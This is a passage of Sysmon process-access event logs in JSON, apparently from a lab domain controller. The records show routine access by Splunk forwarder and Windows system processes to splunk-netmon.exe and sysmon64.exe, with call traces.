{"EventTime":"2020-08-01 07:02:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8822,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:57.998\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nSourceProcessId: 1828\r\nSourceThreadId: 1376\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-13A1-5F25-0000-001005A71000}\r\nTargetProcessId: 2968\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:57.998","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","SourceProcessId":"1828","SourceThreadId":"1376","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-13A1-5F25-0000-001005A71000}","TargetProcessId":"2968","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8823,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:57.998\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-13A1-5F25-0000-001005A71000}\r\nTargetProcessId: 2968\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:57.998","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-13A1-5F25-0000-001005A71000}","TargetProcessId":"2968","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8824,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:57.998\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:57.998","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8825,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:57.998\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:57.998","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8826,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:57.998\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:57.998","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8827,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:57.998\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:57.998","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8828,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:57.998\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:57.998","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8829,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:57.998\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:57.998","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8830,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:57.998\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 